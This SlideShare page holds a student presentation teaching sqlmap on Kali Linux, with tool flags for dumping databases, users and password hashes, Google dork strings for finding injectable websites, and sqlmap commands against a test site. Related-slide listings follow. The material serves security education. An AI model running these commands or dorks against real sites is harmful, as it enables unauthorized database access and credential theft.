Uploaded byNasirAli233814
PPTX, PDF129 views

sqlmap- using -kali -linux by-22011556-105.pptx

sqlmap is an open-source Python tool designed for automating the detection and exploitation of SQL injection vulnerabilities in databases. It supports various database systems and includes features for enumerating users, cracking passwords, and executing custom SQL queries. The tool also provides methods for finding vulnerable websites and can be utilized for penetration testing to ensure database security.

Embed presentation

Download to read offline
sqlmap By: Alishba Sehar
• It is a open source tool to use sql injection in better and simpler way. • sqlmap Developed in python • sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. • It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of- band connections.
Bernardo Damele A. G. (@inquisb) Miroslav Stampar (@stamparm) https://twitter.com/inquisb https://twitter.com/stamparm
•It support various type of database like •MySQL •Oracle •PostgreSQL •Microsoft SQL Server •Microsoft Access • IBM DB2 • SQLite • Firebird •Sybase •SAP MaxDB •HSQLDB • Informix database management systems.
•SQL injection techniques: 1.boolean-based blind 2.time-based blind 3.error-based 4.UNION query 5.stacked queries 6.out-of-band •Enumerate users, password hashes, privileges, roles, databases, tables and columns. • cracking password using a dictionary-based attack. •Support to dump database tables entirely. •Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.
Extracting Information With Sqlmap RECOVER SESSION USER USING SQLMAP. --current-user DETECT CURRENT DATABASE USING SQLMAP. --current-db FIND OUT IF SESSION USER IS DATABASE ADMINISTRATOR USING SQLMAP. --is-dba LIST DATABASE SYSTEM USERS USING SQLMAP. --users LIST DATABASES USING SQLMAP. --dbs DBMS SERVER HOSTNAME. --hostname DBMS EXACT VERSION, OS INFORMATION, ARCHITECTURE AND PATCH LEVEL. -f
Extracting Information With Sqlmap LIST THE DBMS USERS. --users LIST ALL DBMS USERS, PASSWORD HASHES --passwords LIST USERS PRIVILEGES. --privileges LIST ALL COLUMNS or JUST FOR A SPECIFIC TABLE FROM DATABASE --columns (-T <table name> -D <database>) EXECUTING A CUSTOM SQL QUERY. --sql-query=“<sql query to execute>” SQL SHELL TO EXECUTE ALL YOUR CUSTOM SQL QUERIES --sql-shell
Extracting Information With Sqlmap DBMS database to enumerate -D (Database_name) DBMS database table(s) to enumerate -T (table_name) DBMS database table column(s) to enumerate -C (columns_name) Dump DBMS database table entries --dump Dump all DBMS databases tables entries --dump-all Enumerate DBMS database tables --tables Enumerate DBMS users roles --roles
Extracting Information With Sqlmap Retrieve DBMS banner -b, --banner Enumerate DBMS schema --schema Retrieve DBMS comments --comments
•Find a vulnerable website • Google Dorks strings to find Vulnerable SQLMAP SQL injectable website •inurl:product-item.php?id= •inurl:news.php?catid= •inurl:index.php?id= •inurl:title.php?id= •Identify possible injections points •Identify SQLI vulnerabilities: •By using sqlmap •Manual testing •Exploit SQLi vulnerabilities
Kali Linux installed Sqlmap installed
Sqlmap –u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs DBMS databases using SQLMAP SQL Injection
DBMS databases using SQLMAP SQL Injection
List tables of target database using SQLMAP SQL Injection Sqlmap –u http://testphp.vulnweb.com/listproducts.php?cat=1 –D acuart --tables
List columns on target table of selected database using SQLMAP SQL Injection Sqlmap –u http://testphp.vulnweb.com/listproducts.php?cat=1 –D acuart –T users --coulmns
List user and password from target columns of target table of selected database using SQLMAP SQL Injection Sqlmap –u http://testphp.vulnweb.com/listproducts.php?cat=1 –D acuart –T users --dump
http://www.sqlinjection.net/sqlmap/tutorial/ References http://niiconsulting.com/checkmate/2014/01/from-sql-injection-to-0wnage-using-sqlmap/ https://github.com/sqlmapproject/sqlmap/wiki/Usage
Thank you

More Related Content

PPTX
Sql Injection attacks and prevention
byhelloanand
 
PDF
Oracle 21c: New Features and Enhancements of Data Pump & TTS
byChristian Gohmann
 
PPTX
Basic SQL and History
bySomeshwarMoholkar
 
ODP
SQL Tunning
byDhananjay Goel
 
PDF
Performance Stability, Tips and Tricks and Underscores
byJitendra Singh
 
PPTX
Oracle DB Performance Tuning Tips
byAsanka Dilruk
 
PDF
Introduction to SQL Server Security
byJason Strate
 
PPTX
SQL Basics
byHammad Rasheed
 
Sql Injection attacks and prevention
byhelloanand
 
Oracle 21c: New Features and Enhancements of Data Pump & TTS
byChristian Gohmann
 
Basic SQL and History
bySomeshwarMoholkar
 
SQL Tunning
byDhananjay Goel
 
Performance Stability, Tips and Tricks and Underscores
byJitendra Singh
 
Oracle DB Performance Tuning Tips
byAsanka Dilruk
 
Introduction to SQL Server Security
byJason Strate
 
SQL Basics
byHammad Rasheed
 

What's hot

PPTX
Oracle database performance tuning
byYogiji Creations
 
PDF
Triggers and Stored Procedures
byTharindu Weerasinghe
 
PDF
Exploring Oracle Database Performance Tuning Best Practices for DBAs and Deve...
byAaron Shilo
 
PDF
Sql injection with sqlmap
byHerman Duarte
 
PPTX
Understanding SQL Trace, TKPROF and Execution Plan for beginners
byCarlos Sierra
 
PPTX
Sql Basics And Advanced
byrainynovember12
 
PPT
A Brief Introduction in SQL Injection
bySina Manavi
 
PDF
Db2 tutorial
byThe Vision and Insight Corner
 
PPT
Sql injection attack
byRajKumar Rampelli
 
PDF
Pl sql student guide v 1
byNexus
 
PPTX
Oracle REST Data Services: Options for your Web Services
byJeff Smith
 
PPTX
Oracle sql high performance tuning
byGuy Harrison
 
PDF
Cypress Testing Demystified: A Practical Guide
byTestgrid.io
 
PPTX
Informatica PowerCenter
byRamy Mahrous
 
PPSX
How a Developer can Troubleshoot a SQL performing poorly on a Production DB
byCarlos Sierra
 
PPTX
Introduction to REST - API
byChetan Gadodia
 
PDF
Etl overview training
byMondy Holten
 
PDF
Talking About SSRF,CRLF
byn|u - The Open Security Community
 
DOCX
Blood bank report new
byArmaan Pandita
 
PPTX
What is Ad-Hoc Testing
byExforsys Inc
 
Oracle database performance tuning
byYogiji Creations
 
Triggers and Stored Procedures
byTharindu Weerasinghe
 
Exploring Oracle Database Performance Tuning Best Practices for DBAs and Deve...
byAaron Shilo
 
Sql injection with sqlmap
byHerman Duarte
 
Understanding SQL Trace, TKPROF and Execution Plan for beginners
byCarlos Sierra
 
Sql Basics And Advanced
byrainynovember12
 
A Brief Introduction in SQL Injection
bySina Manavi
 
Db2 tutorial
byThe Vision and Insight Corner
 
Sql injection attack
byRajKumar Rampelli
 
Pl sql student guide v 1
byNexus
 
Oracle REST Data Services: Options for your Web Services
byJeff Smith
 
Oracle sql high performance tuning
byGuy Harrison
 
Cypress Testing Demystified: A Practical Guide
byTestgrid.io
 
Informatica PowerCenter
byRamy Mahrous
 
How a Developer can Troubleshoot a SQL performing poorly on a Production DB
byCarlos Sierra
 
Introduction to REST - API
byChetan Gadodia
 
Etl overview training
byMondy Holten
 
Talking About SSRF,CRLF
byn|u - The Open Security Community
 
Blood bank report new
byArmaan Pandita
 
What is Ad-Hoc Testing
byExforsys Inc
 

Similar to sqlmap- using -kali -linux by-22011556-105.pptx

PPTX
Sqlmap
byInstitute of Information Security (IIS)
 
PPT
SQLMAP Tool Usage - A Heads Up
byMindfire Solutions
 
PPTX
Sqlmap
byRushikesh Kulkarni
 
PPTX
Sqlmap
byshamshad9
 
PPTX
Sqlmap
bySiddharthWagh7
 
PPTX
Web application penetration using SQLMAP.
byasmitaanpat
 
PDF
Sql injection manish file
byyukta888
 
PDF
SQL Injection
byAbhinav Nair
 
PDF
Think Like a Hacker - Database Attack Vectors
byMark Ginnebaugh
 
PDF
sqlmap internals
byMiroslav Stampar
 
PDF
Important SQLMap commands
byzubairusman8
 
PPTX
eti.pptx
by15SYGaneshHipparkar
 
PPTX
SQLMap-Automating-the-Hunt-for-Hidden-Injection-Flaws.pdf.pptx
bywininlifeacademy5
 
PPT
Blind SQL Injection
byBlueinfy Solutions
 
PDF
Sql Injection 0wning Enterprise
byn|u - The Open Security Community
 
PDF
Practical Approach towards SQLi ppt
byAhamed Saleem
 
PPT
How to Hack Website using SQL Injection Attack
byCybrary Tech
 
PPTX
SQL Injection Stegnography in Pen Testing
by191013607gouthamsric
 
PDF
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
byGrand Parade Poland
 
PPTX
Sql injection
byTech Bikram
 
Sqlmap
byInstitute of Information Security (IIS)
 
SQLMAP Tool Usage - A Heads Up
byMindfire Solutions
 
Sqlmap
byRushikesh Kulkarni
 
Sqlmap
byshamshad9
 
Sqlmap
bySiddharthWagh7
 
Web application penetration using SQLMAP.
byasmitaanpat
 
Sql injection manish file
byyukta888
 
SQL Injection
byAbhinav Nair
 
Think Like a Hacker - Database Attack Vectors
byMark Ginnebaugh
 
sqlmap internals
byMiroslav Stampar
 
Important SQLMap commands
byzubairusman8
 
eti.pptx
by15SYGaneshHipparkar
 
SQLMap-Automating-the-Hunt-for-Hidden-Injection-Flaws.pdf.pptx
bywininlifeacademy5
 
Blind SQL Injection
byBlueinfy Solutions
 
Sql Injection 0wning Enterprise
byn|u - The Open Security Community
 
Practical Approach towards SQLi ppt
byAhamed Saleem
 
How to Hack Website using SQL Injection Attack
byCybrary Tech
 
SQL Injection Stegnography in Pen Testing
by191013607gouthamsric
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
byGrand Parade Poland
 
Sql injection
byTech Bikram
 

More from NasirAli233814

PPTX
Oop ( operator overloading)
byNasirAli233814
 
PPT
information security Lectures -03,04.ppt
byNasirAli233814
 
PPTX
Lectrue-09,10ModofOperation in information security.pptx
byNasirAli233814
 
PPTX
Week7a.pptx
byNasirAli233814
 
PDF
IT-243-L13-14-1. pdf
byNasirAli233814
 
PPT
Lecture-01,02-1 Information security introduction.ppt
byNasirAli233814
 
PPTX
Week2a.pptx
byNasirAli233814
 
PPTX
information security lecture 7 & 8 .pptx
byNasirAli233814
 
PDF
IT-243-L13-14-2. pdf
byNasirAli233814
 
PDF
database management systems-iT-243-L9.pdf
byNasirAli233814
 
Oop ( operator overloading)
byNasirAli233814
 
information security Lectures -03,04.ppt
byNasirAli233814
 
Lectrue-09,10ModofOperation in information security.pptx
byNasirAli233814
 
Week7a.pptx
byNasirAli233814
 
IT-243-L13-14-1. pdf
byNasirAli233814
 
Lecture-01,02-1 Information security introduction.ppt
byNasirAli233814
 
Week2a.pptx
byNasirAli233814
 
information security lecture 7 & 8 .pptx
byNasirAli233814
 
IT-243-L13-14-2. pdf
byNasirAli233814
 
database management systems-iT-243-L9.pdf
byNasirAli233814
 

Recently uploaded

PDF
Mulesoft Meetup Online Portuguese: MCP e IA
byPedro Baroni
 
PDF
[BDD 2025 - Full-Stack Development] Agentic AI Architecture: Redefining Syste...
byWintari Yasmin
 
PDF
Parallel Computing BCS702 Module notes of the vtu college 7th sem 4.pdf
byMatheshVishnu
 
PPTX
UFCD 0797 - SISTEMAS OPERATIVOS_Unidade Completa.pptx
byscribddobruno
 
PDF
[BDD 2025 - Mobile Development] Mobile Engineer and Software Engineer: Are we...
bywintari3
 
PDF
Open Source Post-Quantum Cryptography - Matt Caswell
byAll Things Open
 
PPTX
"Feelings versus facts: why metrics are more important than intuition", Igor ...
byFwdays
 
PDF
Dev Dives: Build smarter agents with UiPath Agent Builder
byUiPathCommunity
 
PDF
[BDD 2025 - Artificial Intelligence] Building AI Systems That Users (and Comp...
byWintari Yasmin
 
PDF
Transforming Content Operations in the Age of AI
byEnterprise Knowledge
 
PDF
The Necessity of Digital Forensics, the Digital Forensics Process & Laborator...
bychrstnpetwinchester
 
PDF
Top Crypto Supers 15th Report November 2025
byStephen Perrenod
 
PDF
MuleSoft Meetup: Dreamforce'25 Tour- Vibing With AI & Agents.pdf
byTintu Jacob Shaji
 
PDF
10 Best Automation QA Testing Software Tools in 2025.pdf
byRohitBhandari66
 
PDF
Crane Accident Prevention Guide: Key OSHA Regulations for Safer Operations
bySharpEagle Technology
 
PPTX
Leon Brands - Intro to GPU Occlusion (Graphics Programming Conference 2024)
byleonbrands1998
 
PDF
Integrating AI with Meaningful Human Collaboration
byCadabra Studio
 
PDF
5 Common Supply Chain Attacks and How They Work | CyberPro Magazine
byCyberPro Magazine
 
PDF
The partnership effect: Libraries and publishers on collaborating and thrivin...
byBookNet Canada
 
PDF
Cybersecurity Prevention and Detection: Unit 2
byVICTOR MAESTRE RAMIREZ
 
Mulesoft Meetup Online Portuguese: MCP e IA
byPedro Baroni
 
[BDD 2025 - Full-Stack Development] Agentic AI Architecture: Redefining Syste...
byWintari Yasmin
 
Parallel Computing BCS702 Module notes of the vtu college 7th sem 4.pdf
byMatheshVishnu
 
UFCD 0797 - SISTEMAS OPERATIVOS_Unidade Completa.pptx
byscribddobruno
 
[BDD 2025 - Mobile Development] Mobile Engineer and Software Engineer: Are we...
bywintari3
 
Open Source Post-Quantum Cryptography - Matt Caswell
byAll Things Open
 
"Feelings versus facts: why metrics are more important than intuition", Igor ...
byFwdays
 
Dev Dives: Build smarter agents with UiPath Agent Builder
byUiPathCommunity
 
[BDD 2025 - Artificial Intelligence] Building AI Systems That Users (and Comp...
byWintari Yasmin
 
Transforming Content Operations in the Age of AI
byEnterprise Knowledge
 
The Necessity of Digital Forensics, the Digital Forensics Process & Laborator...
bychrstnpetwinchester
 
Top Crypto Supers 15th Report November 2025
byStephen Perrenod
 
MuleSoft Meetup: Dreamforce'25 Tour- Vibing With AI & Agents.pdf
byTintu Jacob Shaji
 
10 Best Automation QA Testing Software Tools in 2025.pdf
byRohitBhandari66
 
Crane Accident Prevention Guide: Key OSHA Regulations for Safer Operations
bySharpEagle Technology
 
Leon Brands - Intro to GPU Occlusion (Graphics Programming Conference 2024)
byleonbrands1998
 
Integrating AI with Meaningful Human Collaboration
byCadabra Studio
 
5 Common Supply Chain Attacks and How They Work | CyberPro Magazine
byCyberPro Magazine
 
The partnership effect: Libraries and publishers on collaborating and thrivin...
byBookNet Canada
 
Cybersecurity Prevention and Detection: Unit 2
byVICTOR MAESTRE RAMIREZ
 

sqlmap- using -kali -linux by-22011556-105.pptx

  • 1.
  • 2.
    • It isa open source tool to use sql injection in better and simpler way. • sqlmap Developed in python • sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. • It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of- band connections.
  • 3.
    Bernardo Damele A.G. (@inquisb) Miroslav Stampar (@stamparm) https://twitter.com/inquisb https://twitter.com/stamparm
  • 4.
    •It support varioustype of database like •MySQL •Oracle •PostgreSQL •Microsoft SQL Server •Microsoft Access • IBM DB2 • SQLite • Firebird •Sybase •SAP MaxDB •HSQLDB • Informix database management systems.
  • 5.
    •SQL injection techniques: 1.boolean-basedblind 2.time-based blind 3.error-based 4.UNION query 5.stacked queries 6.out-of-band •Enumerate users, password hashes, privileges, roles, databases, tables and columns. • cracking password using a dictionary-based attack. •Support to dump database tables entirely. •Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.
  • 9.
    Extracting Information WithSqlmap RECOVER SESSION USER USING SQLMAP. --current-user DETECT CURRENT DATABASE USING SQLMAP. --current-db FIND OUT IF SESSION USER IS DATABASE ADMINISTRATOR USING SQLMAP. --is-dba LIST DATABASE SYSTEM USERS USING SQLMAP. --users LIST DATABASES USING SQLMAP. --dbs DBMS SERVER HOSTNAME. --hostname DBMS EXACT VERSION, OS INFORMATION, ARCHITECTURE AND PATCH LEVEL. -f
  • 10.
    Extracting Information WithSqlmap LIST THE DBMS USERS. --users LIST ALL DBMS USERS, PASSWORD HASHES --passwords LIST USERS PRIVILEGES. --privileges LIST ALL COLUMNS or JUST FOR A SPECIFIC TABLE FROM DATABASE --columns (-T <table name> -D <database>) EXECUTING A CUSTOM SQL QUERY. --sql-query=“<sql query to execute>” SQL SHELL TO EXECUTE ALL YOUR CUSTOM SQL QUERIES --sql-shell
  • 11.
    Extracting Information WithSqlmap DBMS database to enumerate -D (Database_name) DBMS database table(s) to enumerate -T (table_name) DBMS database table column(s) to enumerate -C (columns_name) Dump DBMS database table entries --dump Dump all DBMS databases tables entries --dump-all Enumerate DBMS database tables --tables Enumerate DBMS users roles --roles
  • 12.
    Extracting Information WithSqlmap Retrieve DBMS banner -b, --banner Enumerate DBMS schema --schema Retrieve DBMS comments --comments
  • 13.
    •Find a vulnerablewebsite • Google Dorks strings to find Vulnerable SQLMAP SQL injectable website •inurl:product-item.php?id= •inurl:news.php?catid= •inurl:index.php?id= •inurl:title.php?id= •Identify possible injections points •Identify SQLI vulnerabilities: •By using sqlmap •Manual testing •Exploit SQLi vulnerabilities
  • 14.
  • 15.
    Sqlmap –u http://testphp.vulnweb.com/listproducts.php?cat=1--dbs DBMS databases using SQLMAP SQL Injection
  • 16.
    DBMS databases usingSQLMAP SQL Injection
  • 17.
    List tables oftarget database using SQLMAP SQL Injection Sqlmap –u http://testphp.vulnweb.com/listproducts.php?cat=1 –D acuart --tables
  • 19.
    List columns ontarget table of selected database using SQLMAP SQL Injection Sqlmap –u http://testphp.vulnweb.com/listproducts.php?cat=1 –D acuart –T users --coulmns
  • 20.
    List user andpassword from target columns of target table of selected database using SQLMAP SQL Injection Sqlmap –u http://testphp.vulnweb.com/listproducts.php?cat=1 –D acuart –T users --dump
  • 21.
  • 22.